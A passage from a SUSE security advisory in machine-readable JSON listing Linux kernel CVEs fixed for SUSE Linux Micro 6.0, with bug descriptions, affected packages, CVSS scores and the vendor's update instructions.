"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40289"
},
{
"cve": "CVE-2025-40292",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40292"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-net: fix received length check in big packets\n\nSince commit 4959aebba8c0 (\"virtio-net: use mtu size as buffer length\nfor big packets\"), when guest gso is off, the allocated size for big\npackets is not MAX_SKB_FRAGS * PAGE_SIZE anymore but depends on\nnegotiated MTU. The number of allocated frags for big packets is stored\nin vi-\u003ebig_packets_num_skbfrags.\n\nBecause the host announced buffer length can be malicious (e.g. the host\nvhost_net driver\u0027s get_rx_bufs is modified to announce incorrect\nlength), we need a check in virtio_net receive path. Currently, the\ncheck is not adapted to the new change which can lead to NULL page\npointer dereference in the below while loop when receiving length that\nis larger than the allocated one.\n\nThis commit fixes the received length check corresponding to the new\nchange.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40292",
"url": "https://www.suse.com/security/cve/CVE-2025-40292"
},
{
"category": "external",
"summary": "SUSE Bug 1255175 for CVE-2025-40292",
"url": "https://bugzilla.suse.com/1255175"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40292"
},
{
"cve": "CVE-2025-40293",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40293"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommufd: Don\u0027t overflow during division for dirty tracking\n\nIf pgshift is 63 then BITS_PER_TYPE(*bitmap-\u003ebitmap) * pgsize will overflow\nto 0 and this triggers divide by 0.\n\nIn this case the index should just be 0, so reorganize things to divide\nby shift and avoid hitting any overflows.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40293",
"url": "https://www.suse.com/security/cve/CVE-2025-40293"
},
{
"category": "external",
"summary": "SUSE Bug 1255179 for CVE-2025-40293",
"url": "https://bugzilla.suse.com/1255179"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40293"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-40301",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40301"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_event: validate skb length for unknown CC opcode\n\nIn hci_cmd_complete_evt(), if the command complete event has an unknown\nopcode, we assume the first byte of the remaining skb-\u003edata contains the\nreturn status. However, parameter data has previously been pulled in\nhci_event_func(), which may leave the skb empty. If so, using skb-\u003edata[0]\nfor the return status uses un-init memory.\n\nThe fix is to check skb-\u003elen before using skb-\u003edata.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40301",
"url": "https://www.suse.com/security/cve/CVE-2025-40301"
},
{
"category": "external",
"summary": "SUSE Bug 1255193 for CVE-2025-40301",
"url": "https://bugzilla.suse.com/1255193"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40301"
},
{
"cve": "CVE-2025-40304",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40304"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: Add bounds checking in bit_putcs to fix vmalloc-out-of-bounds\n\nAdd bounds checking to prevent writes past framebuffer boundaries when\nrendering text near screen edges. Return early if the Y position is off-screen\nand clip image height to screen boundary. Break from the rendering loop if the\nX position is off-screen. When clipping image width to fit the screen, update\nthe character count to match the clipped width to prevent buffer size\nmismatches.\n\nWithout the character count update, bit_putcs_aligned and bit_putcs_unaligned\nreceive mismatched parameters where the buffer is allocated for the clipped\nwidth but cnt reflects the original larger count, causing out-of-bounds writes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40304",
"url": "https://www.suse.com/security/cve/CVE-2025-40304"
},
{
"category": "external",
"summary": "SUSE Bug 1255034 for CVE-2025-40304",
"url": "https://bugzilla.suse.com/1255034"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40304"
},
{
"cve": "CVE-2025-40306",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40306"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\norangefs: fix xattr related buffer overflow...\n\nWilly Tarreau \u003cw@1wt.eu\u003e forwarded me a message from\nDisclosure \u003cdisclosure@aisle.com\u003e with the following\nwarning:\n\n\u003e The helper `xattr_key()` uses the pointer variable in the loop condition\n\u003e rather than dereferencing it. As `key` is incremented, it remains non-NULL\n\u003e (until it runs into unmapped memory), so the loop does not terminate on\n\u003e valid C strings and will walk memory indefinitely, consuming CPU or hanging\n\u003e the thread.\n\nI easily reproduced this with setfattr and getfattr, causing a kernel\noops, hung user processes and corrupted orangefs files. Disclosure\nsent along a diff (not a patch) with a suggested fix, which I based\nthis patch on.\n\nAfter xattr_key started working right, xfstest generic/069 exposed an\nxattr related memory leak that lead to OOM. xattr_key returns\na hashed key. When adding xattrs to the orangefs xattr cache, orangefs\nused hash_add, a kernel hashing macro. hash_add also hashes the key using\nhash_log which resulted in additions to the xattr cache going to the wrong\nhash bucket. generic/069 tortures a single file and orangefs does a\ngetattr for the xattr \"security.capability\" every time. Orangefs\nnegative caches on xattrs which includes a kmalloc. Since adds to the\nxattr cache were going to the wrong bucket, every getattr for\n\"security.capability\" resulted in another kmalloc, none of which were\never freed.\n\nI changed the two uses of hash_add to hlist_add_head instead\nand the memory leak ceased and generic/069 quit throwing furniture.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40306",
"url": "https://www.suse.com/security/cve/CVE-2025-40306"
},
{
"category": "external",
"summary": "SUSE Bug 1255062 for CVE-2025-40306",
"url": "https://bugzilla.suse.com/1255062"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40306"
},
{
"cve": "CVE-2025-40307",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40307"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: validate cluster allocation bits of the allocation bitmap\n\nsyzbot created an exfat image with cluster bits not set for the allocation\nbitmap. exfat-fs reads and uses the allocation bitmap without checking\nthis. The problem is that if the start cluster of the allocation bitmap\nis 6, cluster 6 can be allocated when creating a directory with mkdir.\nexfat zeros out this cluster in exfat_mkdir, which can delete existing\nentries. This can reallocate the allocated entries. In addition,\nthe allocation bitmap is also zeroed out, so cluster 6 can be reallocated.\nThis patch adds exfat_test_bitmap_range to validate that clusters used for\nthe allocation bitmap are correctly marked as in-use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40307",
"url": "https://www.suse.com/security/cve/CVE-2025-40307"
},
{
"category": "external",
"summary": "SUSE Bug 1255039 for CVE-2025-40307",
"url": "https://bugzilla.suse.com/1255039"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
